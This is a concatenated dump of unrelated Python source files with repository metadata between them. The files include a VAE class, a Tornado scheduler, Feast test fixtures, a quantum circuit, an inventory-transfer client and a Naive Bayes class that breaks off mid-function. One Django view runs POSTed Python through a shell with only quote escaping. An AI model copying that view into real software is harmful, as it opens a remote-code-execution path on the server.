(mu, logvar) = self.sess.run([self.mu, self.logvar], feed_dict={self.x: x})
return mu, logvar
def encode_mu_sigma(self, x):
(mu, sigma) = self.sess.run([self.mu, self.sigma], feed_dict={self.x: x})
return mu, sigma
def decode(self, z):
return self.sess.run(self.y, feed_dict={self.z: z})
def get_model_params(self):
# get trainable params.
model_names = []
model_params = []
model_shapes = []
with self.g.as_default():
t_vars = tf.trainable_variables()
for var in t_vars:
#if var.name.startswith('conv_vae'):
param_name = var.name
p = self.sess.run(var)
model_names.append(param_name)
params = np.round(p*10000).astype(np.int).tolist()
model_params.append(params)
model_shapes.append(p.shape)
return model_params, model_shapes, model_names
def get_model_params_with_name(self, names):
model_params = []
with self.g.as_default():
t_vars = tf.trainable_variables()
d = dict()
for var in t_vars:
d[var.name] = var
for name in names:
p = self.sess.run(d[name])
p = np.array(p)
p = p.ravel()
params = np.round(p * 10000).astype(np.int32)
'''bytes = base64.b64encode(params)
bstr = base64.b64encode(bytes)'''
#print(name, p.shape)
model_params.append(params)
f = open("carvae.js", "w")
f.write('var carvae_data=[')
for j,p in enumerate(model_params):
if j > 0:
f.write(", ")
f.write('[')
for i, q in enumerate(p):
if i > 0:
f.write(", ")
f.write(str(q))
f.write(']\n')
f.write('];\n')
return model_params
def get_random_model_params(self, stdev=0.5):
# get random params.
_, mshape, _ = self.get_model_params()
rparam = []
for s in mshape:
#rparam.append(np.random.randn(*s)*stdev)
rparam.append(np.random.standard_cauchy(s)*stdev) # spice things up
return rparam
def set_model_params(self, params):
with self.g.as_default():
t_vars = tf.trainable_variables()
idx = 0
for var in t_vars:
#if var.name.startswith('conv_vae'):
pshape = tuple(var.get_shape().as_list())
p = np.array(params[idx])
assert pshape == p.shape, "inconsistent shape"
assign_op, pl = self.assign_ops[var]
self.sess.run(assign_op, feed_dict={pl.name: p/10000.})
idx += 1
def load_json(self, jsonfile='vae.json'):
with open(jsonfile, 'r') as f:
params = json.load(f)
self.set_model_params(params)
def save_json(self, jsonfile='vae.json'):
model_params, model_shapes, model_names = self.get_model_params()
qparams = []
for p in model_params:
qparams.append(p)
with open(jsonfile, 'wt') as outfile:
json.dump(qparams, outfile, sort_keys=True, indent=0, separators=(',', ': '))
def set_random_params(self, stdev=0.5):
rparam = self.get_random_model_params(stdev)
self.set_model_params(rparam)
def save_model(self, model_save_path):
sess = self.sess
with self.g.as_default():
saver = tf.train.Saver(tf.global_variables())
checkpoint_path = os.path.join(model_save_path, 'vae')
tf.logging.info('saving model %s.', checkpoint_path)
saver.save(sess, checkpoint_path, 0) # just keep one
def load_checkpoint(self, checkpoint_path):
sess = self.sess
with self.g.as_default():
saver = tf.train.Saver(tf.global_variables())
ckpt = tf.train.get_checkpoint_state(checkpoint_path)
print('loading model', ckpt.model_checkpoint_path)
tf.logging.info('Loading model %s.', ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
|
[
"shadekcse07@gmail.com"
] |
shadekcse07@gmail.com
|
8307abd7d1d4335894813e096c0432b653ae323a
|
204bccf5d97ad228d9a19474cd4a24d9c08683f7
|
/mdmscheduler/server/server.py
|
cc505413b76d379d13d68a78f88c3ab82d0e227c
|
[
"BSD-2-Clause"
] |
permissive
|
Retailwhizz/mdm-scheduler
|
3a934a0bba57d7b5c8d8e53b1d218aff2c548e0c
|
52fa3721563f514236cd6596de27ad0f96f41f5f
|
refs/heads/master
| 2021-07-15T17:09:33.232419
| 2021-03-05T06:37:12
| 2021-03-05T06:37:12
| 79,448,567
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,776
|
py
|
"""Runs a tornado process to run scheduler daemon and provides REST API & web ui.
How to use:
SchedulerServer.run()
"""
import logging
import signal
import sys
import tornado
from mdmscheduler import settings
from mdmscheduler.core import scheduler_manager
from mdmscheduler.server.handlers import audit_logs
from mdmscheduler.server.handlers import executions
from mdmscheduler.server.handlers import index
from mdmscheduler.server.handlers import jobs
logger = logging.getLogger(__name__)
class SchedulerServer:
VERSION = 'v1'
singleton = None
def __init__(self, scheduler_instance):
# Start scheduler
self.scheduler_manager = scheduler_instance
self.tornado_settings = dict(
debug=settings.DEBUG,
static_path=settings.STATIC_DIR_PATH,
template_path=settings.TEMPLATE_DIR_PATH,
scheduler_manager=self.scheduler_manager
)
# Setup server
URLS = [
# Index page
(r'/', index.Handler),
# APIs
(r'/api/%s/jobs' % self.VERSION, jobs.Handler),
(r'/api/%s/jobs/(.*)' % self.VERSION, jobs.Handler),
(r'/api/%s/executions' % self.VERSION, executions.Handler),
(r'/api/%s/executions/(.*)' % self.VERSION, executions.Handler),
(r'/api/%s/logs' % self.VERSION, audit_logs.Handler),
]
self.application = tornado.web.Application(URLS, **self.tornado_settings)
def start_scheduler(self):
self.scheduler_manager.start()
self.post_scheduler_start()
def post_scheduler_start(self):
"""Implement this function to do things once scheduler starts"""
pass
def stop_scheduler(self):
self.scheduler_manager.stop()
self.post_scheduler_stop()
def post_scheduler_stop(self):
"""Implement this function to do things once scheduler stops"""
pass
@classmethod
def signal_handler(cls, signal, frame):
logger.info('Stopping scheduler ...')
cls.singleton.stop_scheduler()
logger.info('Done. Bye ~')
sys.exit(0)
@classmethod
def run(cls):
if not cls.singleton:
signal.signal(signal.SIGINT, cls.signal_handler)
cls.singleton = cls(scheduler_manager.SchedulerManager.get_instance())
cls.singleton.start_scheduler()
cls.singleton.application.listen(settings.HTTP_PORT, settings.HTTP_ADDRESS)
logger.info('Running server at %s:%d ...' % (settings.HTTP_ADDRESS, settings.HTTP_PORT))
logger.info('*** You can access scheduler web ui at http://localhost:%d'
' ***' % settings.HTTP_PORT)
tornado.ioloop.IOLoop.instance().start()
|
[
"aibin@retailwhizz.com"
] |
aibin@retailwhizz.com
|
65c48e3536beca9173c620ffa26d3919c5b70a43
|
b7cd748798b2b6fab837a227624eb9fe7ebec1c8
|
/src/notelink/main.py
|
17620ce4677bb31e44a6784fbebfacd34640f85f
|
[
"MIT"
] |
permissive
|
agung96tm/notelink
|
c9314e82c3d976bfb93930eb2293fe15564a8f3d
|
a0adf49254265a7a5e74edf97b0fa5f293302a0c
|
refs/heads/main
| 2023-05-10T14:49:58.294378
| 2021-06-13T15:46:21
| 2021-06-13T15:46:21
| 376,555,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,228
|
py
|
from typing import Union, List
import click
from notelink.promps.list import (
ask_to_choose_hostname,
ask_to_choose_action,
ask_to_choose_hostname_with_action,
)
from notelink.promps.search import ask_for_search_action
from notelink.core import NoteMe, ensure_config
from notelink.core import helpers
@click.group()
@click.pass_context
def cli(ctx):
ctx.obj = NoteMe()
ensure_config(ctx.obj.config)
@cli.command()
@click.argument('link', nargs=-1)
@click.pass_obj
def nsave(note_me: NoteMe, link: Union[str, List[str]]) -> None:
note_me.bulk_save(link)
@cli.command()
@click.option('--list-host', is_flag=True)
@click.option('--reverse/--no-reverse', default=False)
@click.option('-h', '--hostname', type=str)
@click.pass_obj
def nlist(note_me: NoteMe, list_host: bool, reverse: bool, hostname: str) -> None:
if list_host:
link_chosen, action = ask_to_choose_hostname_with_action(note_me, reverse)
if not link_chosen:
click.echo(f'hostname is empty')
return
helpers.helper_for_hostname_action(note_me=note_me, link_chosen=link_chosen, action=action)
else:
hostname_ = ask_to_choose_hostname(note_me, reverse) if not hostname else hostname
if note_me.is_empty_list_for(hostname_):
if hostname_:
click.echo(f'link for hostname "{hostname_}" is empty')
else:
click.echo(f'hostname is empty')
return
link_chosen, action = ask_to_choose_action(note_me, hostname_)
helpers.helper_for_action(note_me=note_me, link_chosen=link_chosen, action=action)
@cli.command()
@click.argument('search', type=str)
@click.option('-l', '--limit', type=int)
@click.option('-h', '--hostname', type=str)
@click.pass_obj
def nsearch(note_me: NoteMe, search: str, limit: int, hostname: str) -> None:
list_links = note_me.search(search_value=search, limit=limit, hostname=hostname)
if len(list_links) == 0:
click.echo('Your search did found')
return
link_chosen, action = ask_for_search_action(list_links)
helpers.helper_for_action(note_me=note_me, link_chosen=link_chosen, action=action)
if __name__ == '__main__':
cli()
|
[
"agung.96tm@gmail.com"
] |
agung.96tm@gmail.com
|
a9df98d869d092be6ca5d2b0786db96248d959ac
|
15276b46ad1155d0c25f432f22a0562c0ec32768
|
/webserver/webserver.py
|
4d03f0e701d85f742df85767d953ae97375bf949
|
[] |
no_license
|
Zanobos/macloc
|
c81cd6f1cdb31d13ba80a8aebc93b73ca5be9b94
|
e98eefe58b309f2d09acad78f70551120222485f
|
refs/heads/master
| 2022-12-09T23:40:44.252130
| 2019-08-24T08:01:08
| 2019-08-24T08:01:08
| 145,012,464
| 0
| 0
| null | 2022-12-08T10:12:20
| 2018-08-16T16:18:49
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 482
|
py
|
from app import create_app, db, socketio
from app.models import Wall, Climb, User, Hold, HistoricHold, HistoricWall, Record
app = create_app()
if __name__ == '__main__':
socketio.run(app)
@app.shell_context_processor
def make_shell_context():
return {
'db': db,
'Wall': Wall,
'Climb': Climb,
'User': User,
'Hold': Hold,
'HistoricWall': HistoricWall,
'HistoricHold': HistoricHold,
'Record': Record
}
|
[
"a.zanotti@reply.it"
] |
a.zanotti@reply.it
|
679b80cdabd7d1b0f0f943061fd38fd8e06f77c2
|
cd8b95dac290a7c638e1ea5bbbbcdbf6c114c1e4
|
/tests/e2e/fixtures/feast_services.py
|
ce7f854691700650fc8e048b938acaa4134aee63
|
[
"Apache-2.0"
] |
permissive
|
DaoCalendar/feast
|
ceb8bd136a912ba13860ddf44a75f3cf2d6103ed
|
c8fca7b767e54e5211dca3bc4851864cd30899e0
|
refs/heads/master
| 2023-01-01T16:16:55.410038
| 2020-10-30T10:54:34
| 2020-10-30T10:54:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,588
|
py
|
import os
import shutil
import socket
import subprocess
import tempfile
import time
from typing import Any, Dict
import pytest
import yaml
from pytest_postgresql.executor import PostgreSQLExecutor
from pytest_redis.executor import RedisExecutor
__all__ = (
"feast_core",
"feast_serving",
"enable_auth",
)
def _start_jar(jar, options=None) -> subprocess.Popen:
if not os.path.isfile(jar):
raise ValueError(f"{jar} doesn't exist")
cmd = [shutil.which("java"), "-jar", jar]
if options:
cmd.extend(options)
return subprocess.Popen(cmd) # type: ignore
def _wait_port_open(port, max_wait=60):
print(f"Waiting for port {port}")
start = time.time()
while True:
try:
socket.create_connection(("localhost", port), timeout=1)
except OSError:
if time.time() - start > max_wait:
raise
time.sleep(1)
else:
return
@pytest.fixture(scope="session", params=[True, False])
def enable_auth(request):
return request.param
@pytest.fixture(scope="session")
def feast_core(
project_root, project_version, enable_auth, postgres_server: PostgreSQLExecutor
):
jar = str(
project_root / "core" / "target" / f"feast-core-{project_version}-exec.jar"
)
config = dict(
feast=dict(
security=dict(
enabled=enable_auth,
provider="jwt",
options=dict(
jwkEndpointURI="https://www.googleapis.com/oauth2/v3/certs"
),
)
),
spring=dict(
datasource=dict(
url=f"jdbc:postgresql://{postgres_server.host}:{postgres_server.port}/postgres"
)
),
)
with tempfile.NamedTemporaryFile(suffix=".yaml", mode="w+") as config_file:
yaml.dump(config, config_file)
config_file.flush()
process = _start_jar(
jar,
[
f"--spring.config.location=classpath:/application.yml,file://{config_file.name}"
],
)
_wait_port_open(6565)
yield "localhost", 6565
process.terminate()
@pytest.fixture(scope="session")
def feast_serving(
project_root,
project_version,
enable_auth,
redis_server: RedisExecutor,
feast_core,
pytestconfig,
):
jar = str(
project_root
/ "serving"
/ "target"
/ f"feast-serving-{project_version}-exec.jar"
)
if pytestconfig.getoption("redis_cluster"):
store: Dict[str, Any] = dict(
name="online",
type="REDIS_CLUSTER",
config=dict(connection_string=f"{redis_server.host}:{redis_server.port}"),
)
else:
store = dict(
name="online",
type="REDIS",
config=dict(host=redis_server.host, port=redis_server.port),
)
config = dict(
feast=dict(
stores=[store],
coreAuthentication=dict(enabled=enable_auth, provider="google"),
security=dict(authentication=dict(enabled=enable_auth, provider="jwt")),
)
)
with tempfile.NamedTemporaryFile(suffix=".yaml", mode="w+") as config_file:
yaml.dump(config, config_file)
config_file.flush()
process = _start_jar(
jar,
[
f"--spring.config.location=classpath:/application.yml,file://{config_file.name}"
],
)
_wait_port_open(6566)
yield "localhost", 6566
process.terminate()
|
[
"noreply@github.com"
] |
DaoCalendar.noreply@github.com
|
497f4c82a57b7a113a2407a042eb8ced9fa93964
|
b807d05f7af7430a1545330152681a4b7fad7f1f
|
/Python/Intersection_of_Two_Arrays.py
|
ed9b3cfe64706c1d82b8378aaaa10b1753c13eda
|
[] |
no_license
|
SuryankDixit/LeetCode_Algorithms
|
51578f39766f0cde9977f8f07166ace92a873512
|
63e1694c1746072d55fcec55240a3de74c930094
|
refs/heads/main
| 2022-12-31T08:58:30.419769
| 2020-10-20T14:36:00
| 2020-10-20T14:36:00
| 305,772,219
| 3
| 0
| null | 2020-10-20T16:40:29
| 2020-10-20T16:40:28
| null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
from typing import List
class Solution:
def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:
result = set.intersection(set(nums1), set(nums2))
return list(result)
|
[
"melvinredvirus@gmail.com"
] |
melvinredvirus@gmail.com
|
2cfd479123fb0555b468d1854cef87480d0b0289
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Kivy/my_kivy_project/lib/python3.8/site-packages/coverage/config.py
|
88abdd1fd344823ce70ec6953b0a6f5dad3b2769
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:b8d5580bba47dfe77ecc21f4846584e5574caf8bdc76c0a4a1d5246b33d71ce8
size 18952
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
0fffcd550675c32d1c9aa19cea0ce552b9414efe
|
3db48e7c13b330af7c488820d14d22edf0a7cfda
|
/DP/[8-2]개미 전사.py
|
dd4e34ae56023949d50597545c8f35bc626840b0
|
[] |
no_license
|
kim-kiwon/Coding-test
|
1555d7e7699a21655e86f892e76f784accf4b9cc
|
aa8563ab54596c9c6dace84494d4f68fbd8e97f4
|
refs/heads/master
| 2023-04-01T10:04:11.152485
| 2021-04-05T10:17:51
| 2021-04-05T10:17:51
| 328,202,195
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
n = int(input())
arr = [0] + list(map(int, input().split()))
dp = [0] * (n+1)
dp[1] = arr[1]
dp[2] = max(arr[1], arr[2])
for i in range(3, n+1):
dp[i] = max(arr[i]+dp[i-2], dp[i-1])
print(dp[n])
|
[
"kimkiwonn@gmail.com"
] |
kimkiwonn@gmail.com
|
b618f6884d24363fdb9831823979ce74a14c34c9
|
baa8387f014c08f5c9879c93d33befdb40b16573
|
/apps/naim/main.py
|
253a7845cbec4f22afdaf3026efb7ae2a2747593
|
[] |
no_license
|
nmlorg/nmlorg.github.io
|
f72c1c63db355a40aa353ae0b811bbc27cd8b9a6
|
cc7f5b9001a7435e9bf7e2662fff2ceeef5a72a3
|
refs/heads/master
| 2020-04-15T23:48:53.806689
| 2019-03-02T03:53:11
| 2019-03-02T03:53:11
| 32,093,297
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 392
|
py
|
# Copyright 2015 Daniel Reed <n@ml.org>
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
class Redirect(webapp.RequestHandler):
def get(self):
self.redirect('https://nmlorg.github.io/naim/')
app = webapp.WSGIApplication([
('/.*', Redirect),
], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
|
[
"n@ml.org"
] |
n@ml.org
|
d1f37dedd61aa33d8ff33c30cb55836c20ce2f68
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/benchmark/startPyquil555.py
|
67f8d230406876219e0b959392ccd8343d614971
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998
| 2021-09-19T02:56:16
| 2021-09-19T02:56:16
| 405,159,939
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,152
|
py
|
# qubit number=4
# total number=12
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += Y(3) # number=5
prog += SWAP(1,0) # number=6
prog += Y(2) # number=8
prog += Y(2) # number=9
prog += X(3) # number=10
prog += X(3) # number=11
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil555.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
|
[
"wangjiyuan123@yeah.net"
] |
wangjiyuan123@yeah.net
|
a8e25837ac8c8efd2530bfb9d16247010fed92d9
|
9ba36e3d9132f812d437f9bc820a54724f1ea831
|
/webshell/views.py
|
55c2ac1d9ffd4380b3526f2bef2bcf178e039105
|
[
"MIT"
] |
permissive
|
MarkTseng/django-webshell
|
498c87c62eb9389cf05c1279bc7415703f662070
|
c32a089cefae95cddda63a0f086c976e318ba35d
|
refs/heads/master
| 2021-01-21T16:04:03.264661
| 2014-08-06T09:31:44
| 2014-08-06T09:31:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
from subprocess import Popen, PIPE
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from django.contrib.auth.decorators import permission_required
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import HtmlFormatter
@csrf_exempt
@require_POST
@permission_required('is_superuser')
def execute_script_view(request):
source = request.POST.get('source', '').replace('"', r'\"')
proc = Popen('python -c "%s"' % source, shell=True, stdout=PIPE, stderr=PIPE)
out, err = proc.communicate()
lexer = get_lexer_by_name('pytb', stripall=True)
formatter = HtmlFormatter(linenos=True, cssclass='source')
result = highlight(out or err, lexer, formatter)
return HttpResponse(result)
|
[
"and@rey.im"
] |
and@rey.im
|
8d9613ae4ac31c20991c2487eb559bf3857767eb
|
be8508072a73ab79b9678bdf28d944cc2e2f87f1
|
/spock.py
|
3b8a8fa5eb2ebb60dc2d08773fa35701094f146e
|
[] |
no_license
|
colingalvin/RPSLSPython
|
0a351498f8ef66ed7ede925714d55986e54731ec
|
c313d38b8ddab46b2b87ccc5c4148e2f3a36a470
|
refs/heads/main
| 2023-01-13T05:26:52.460513
| 2020-11-10T21:24:20
| 2020-11-10T21:24:20
| 311,762,333
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 285
|
py
|
from gesture import Gesture
class Spock(Gesture):
def __init__(self):
self.name = "Spock"
self.can_beat_rock = True
self.can_beat_paper = False
self.can_beat_scissors = True
self.can_beat_lizard = False
self.can_beat_spock = False
|
[
"colingalvin@ymail.com"
] |
colingalvin@ymail.com
|
c61c0d76286653ca49a74c2488c37db97b7b2ee3
|
dd58a1f2be0617eb8d167c8f5bd51b62879e0b53
|
/tubers/webpages/models.py
|
9b86f86299160880ac468cc2ac0a349aefaf3bdd
|
[] |
no_license
|
NerdyCoder-AJ/Tubers
|
6421808f33491de6bcd7abac01c9ad68799a862e
|
b7a637f6f2573b31aac11ad3a93975c1aa002805
|
refs/heads/master
| 2023-05-27T16:17:19.159407
| 2021-06-11T02:19:10
| 2021-06-11T02:19:10
| 372,412,000
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 785
|
py
|
from django.db import models
from django.db.models.fields import DateTimeField
# Create your models here.
class Team(models.Model):
first_name = models.CharField(max_length=200)
last_name = models.CharField(max_length=200)
role = models.CharField(max_length=200)
fb_link = models.CharField(max_length=200)
insta_link = models.CharField(max_length=200)
photo = models.ImageField(upload_to='media/team/%Y/%m/%d/')
cerated_date = DateTimeField(auto_now_add=True)
class Slider(models.Model):
headline = models.CharField(max_length=255)
subtitle = models.CharField(max_length=255)
button_text = models.CharField(max_length=255)
photo = models.ImageField(upload_to='media/slider/%y/')
created_date = models.DateTimeField(auto_now_add=True)
|
[
"akash.codeway@gmail.com"
] |
akash.codeway@gmail.com
|
b191f1b78146aef2f3c456ec36080ade1f859998
|
4f2ddf4f26aa9c2024a54bf30e5fd54c0b377949
|
/RedAnt_2018/RedAnt/file/urls.py
|
278e4babb8978e949ab1602aceb804a58799e161
|
[] |
no_license
|
grapefruitNanM/-2017
|
2803edcb7eb02fda0f137d37204378cbe76d6500
|
81d896b31eab42080fe559064455c01c527ec042
|
refs/heads/master
| 2020-03-29T05:32:47.850475
| 2018-09-20T09:56:08
| 2018-09-20T09:56:08
| 149,586,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from django.conf.urls import include, url
import RedAnt.file.views as views
urlpatterns = [
url(r'', views.getFile),
]
|
[
"1074516814@qq.com"
] |
1074516814@qq.com
|
5234e461f3a500afc3ae3ee0cd58ee11938d3f1f
|
caa8b60f3f2bbc43220fa80c2663a8a84b95368f
|
/pyogp/apps/examples/inventory_transfer.py
|
b0c30d596b6e3fb8e673ef4446009cb461e7a0e5
|
[
"Apache-2.0"
] |
permissive
|
grobertson/PyOGP.Apps
|
fb1ac597eb3042c7352a08d033e84ab31b2ffaeb
|
03583baa8d3a2438b0d0a5452ee8c9e56aace9fd
|
refs/heads/master
| 2020-03-28T18:47:17.308284
| 2010-02-09T23:19:32
| 2010-02-09T23:19:32
| 148,911,566
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,205
|
py
|
# standard
import re
import getpass, sys, logging
from optparse import OptionParser
import time
# related
from eventlet import api
# pyogp
from pyogp.lib.client.agent import Agent
from pyogp.lib.client.agentmanager import AgentManager
from pyogp.lib.client.settings import Settings
from pyogp.lib.base.helpers import Wait
def login():
""" login an to a login endpoint """
parser = OptionParser(usage="usage: %prog --file filename [options]")
logger = logging.getLogger("client.example")
parser.add_option("-l", "--loginuri", dest="loginuri", default="https://login.aditi.lindenlab.com/cgi-bin/login.cgi",
help="specified the target loginuri")
parser.add_option("-r", "--region", dest="region", default=None,
help="specifies the region (regionname/x/y/z) to connect to")
parser.add_option("-q", "--quiet", dest="verbose", default=True, action="store_false",
help="enable verbose mode")
parser.add_option("-f", "--file", dest="file", default=None, help="csv formatted file containing first,last,pass for multi agent login (required)")
parser.add_option("-c", "--count", dest="count", default=0, help="number of agents to login")
parser.add_option("-s", "--search", dest="search", default=None, help = "name of inventory item to search for and transfer to account number 2")
(options, args) = parser.parse_args()
options.count = int(options.count)
if len(args) > 0:
parser.error("Unsupported arguments specified: " + str(args))
if options.file == None:
parser.error("Missing required -f argument for logging in multiple agents")
try:
f = open(options.file, 'r')
data = f.readlines()
f.close()
except IOError, error:
print 'File not found. Stopping. Error: %s' % (error)
return
clients = []
line_count = 0
for line in data:
line_count += 1
if options.count > 0:
if options.count > line_count:
print "The count parameter requests more agents (%s) than you have in your data file (%s). Logging in max available." % (options.count, line_count)
counter = 0
for line in data:
counter += 1
if len(line.strip().split(',')) != 3:
print 'We expect a line with 3 comma separated parameters, we got %s' % (line.strip().split(','))
print 'Stopping.'
clients.append(line.strip().split(','))
if counter >= options.count:
break
if options.verbose:
console = logging.StreamHandler()
console.setLevel(logging.DEBUG) # seems to be a no op, set it for the logger
formatter = logging.Formatter('%(asctime)-30s%(name)-30s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
# setting the level for the handler above seems to be a no-op
# it needs to be set for the logger, here the root logger
# otherwise it is NOTSET(=0) which means to log nothing.
logging.getLogger('').setLevel(logging.DEBUG)
else:
print "Attention: This script will print nothing if you use -q. So it might be boring to use it like that ;-)"
# prep instance settings
settings = Settings()
settings.ENABLE_INVENTORY_MANAGEMENT = True
settings.ENABLE_COMMUNICATIONS_TRACKING = False
settings.ENABLE_OBJECT_TRACKING = False
settings.ENABLE_UDP_LOGGING =True
settings.ENABLE_EQ_LOGGING = True
settings.ENABLE_CAPS_LOGGING = True
settings.MULTIPLE_SIM_CONNECTIONS = False
settings.ACCEPT_INVENTORY_OFFERS = True
agents = []
# Now let's prime the accounts for login
for params in clients:
#First, initialize the agent
agents.append(Agent(settings, params[0], params[1], params[2]))
agentmanager = AgentManager()
agentmanager.initialize(agents)
#print 'Storing agents:'
#for agent in agentmanager.agents:
#print '\t' + agentmanager.agents[agent].Name()
# log them in
for key in agentmanager.agents:
agentmanager.login(key, options.loginuri, options.region)
############ WORKING HERE
# allow 10 seconds for agents to connect
Wait(10)
giver = None
receiver = None
keys = agentmanager.agents.keys()
giver = agentmanager.agents[keys[0]]
receiver = agentmanager.agents[keys[1]]
print ''
print ''
print ''
print ''
print 'Agent giving inventory is: %s' % (giver)
print 'Agent receiving inventory is: %s' % (receiver)
print ''
print ''
print ''
print ''
# for folders whose parent = root folder aka My Inventory, request their contents
[giver.inventory._request_folder_contents(folder.FolderID) for folder in giver.inventory.folders if folder.ParentID == giver.inventory.inventory_root.FolderID]
#while client.running:
#api.sleep(0)
# next, let's wait 5 seconds and FetchInventory for items we know about
Wait(10)
if options.search != None:
# and next, let's search the inventory by name
matches = giver.inventory.search_inventory(name = options.search)
# now, if we have a match, let's try and rez the first matching object
item_to_give = matches[0]
print ''
print ''
print ''
print ''
print "Found item to give to another agent: %s" % (str(item_to_give.__dict__))
print ''
print ''
print ''
print ''
giver.inventory.give_inventory(item_to_give.ItemID, receiver.agent_id)
while agentmanager.has_agents_running():
api.sleep(0)
def main():
return login()
if __name__=="__main__":
main()
"""
Contributors can be viewed at:
http://svn.secondlife.com/svn/linden/projects/2008/pyogp/CONTRIBUTORS.txt
$LicenseInfo:firstyear=2008&license=apachev2$
Copyright 2009, Linden Research, Inc.
Licensed under the Apache License, Version 2.0 (the "License").
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
or in
http://svn.secondlife.com/svn/linden/projects/2008/pyogp/LICENSE.txt
$/LicenseInfo$
"""
|
[
"enus@lindenlab.com"
] |
enus@lindenlab.com
|
558e6dc5b86f48f3be3389deb18431743181d8c5
|
b92fa9d959a88967cb39ce4021e92958bf630eaa
|
/NaiveBayes.py
|
d027ca1045fa11bbb1a8f3b7685579a2ee584a6c
|
[] |
no_license
|
rishabhzn200/NaiveBayes
|
d8e1e4b421aefa5ac62f5e5782825d9127bcc92f
|
97e7b7fa247b2534563ed8c3aaaf4144675e1453
|
refs/heads/master
| 2021-07-07T00:07:06.347172
| 2017-10-02T08:30:01
| 2017-10-02T08:30:01
| 105,513,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,829
|
py
|
import math
class NaiveBayes:
def __init__(self):
pass
def mean(self, data):
return sum(data)/float(data.__len__())
pass
def stddev(self, data):
average = self.mean(data)
variance = sum( pow(d - average , 2) for d in data ) / float(data.__len__() - 1)
return math.sqrt(variance)
pass
#Here input dataset is rows of list of attributes corresponding to a particular class.
#We need to find the mean and standard deviation for all the attributes. and return it
def findMeanStddev(self, dataset):
mean_stddev = [ (self.mean(attr), self.stddev(attr)) for attr in zip(*dataset)]
del mean_stddev[-1] #to remove mean and stddev of class labels
return mean_stddev
pass
def splitDataByClass(self, datasetToBeSplitByClass):
dataByClass = {}
for i in range(datasetToBeSplitByClass.__len__()):
rowData = datasetToBeSplitByClass[i]
classLabel = rowData[-1]
if classLabel not in dataByClass:
dataByClass[classLabel] = []
dataByClass[classLabel].append(rowData)
return dataByClass
def createModel(self, dataset):
#Get dictionary with class labels as keys and other attributes list as values using splitDataByClass
classDict = self.splitDataByClass(dataset)
model = {} # used to store mean and standard deviation for each classLabel
for classLabel, values in classDict.iteritems():
#values has data corresponding to classLabel. This data is row of list of attributes
model[classLabel] = self.findMeanStddev(values)
#model has tuple of mean and standard deviation for all the attributes and all class labels.
return model
def calculateProbability(self, data, mean, stddev):
exp = math.exp(-(math.pow(data - mean , 2) / (2 * math.pow(stddev, 2))))
return (1 / (math.sqrt(2 * math.pi) * stddev)) * exp
#For each test data calculateClassProbability.
#data here is 1 row of test data with all the attributes
#model here is list of tuples of mean and std dev. One tuple in the list corresponds to each attributes.
#This function assumes conditional independence among the attributes to calculate the probability using Naive Bayes.
def calculateClassProbabilities(self, model, data): # list of tuples of mean and stddev
classProbabilities = {}
for classLabel, values in model.iteritems():
classProbabilities[classLabel] = 1
for index in range(values.__len__()): # run till number of attributes
mean, stddev = values[index]
dataX = data[index]
classProbabilities[classLabel] = classProbabilities[classLabel] * self.calculateProbability(dataX, mean, stddev)
return classProbabilities
def predict(self, model, data):
classProbabilities = self.calculateClassProbabilities(model, data)
predictedLabel = None
predProbability = -1
for classLabel, prob in classProbabilities.iteritems():
if predictedLabel is None or prob > predProbability:
predictedLabel = classLabel
predProbability = prob
return predictedLabel
def getPredictions(self, model, testData):
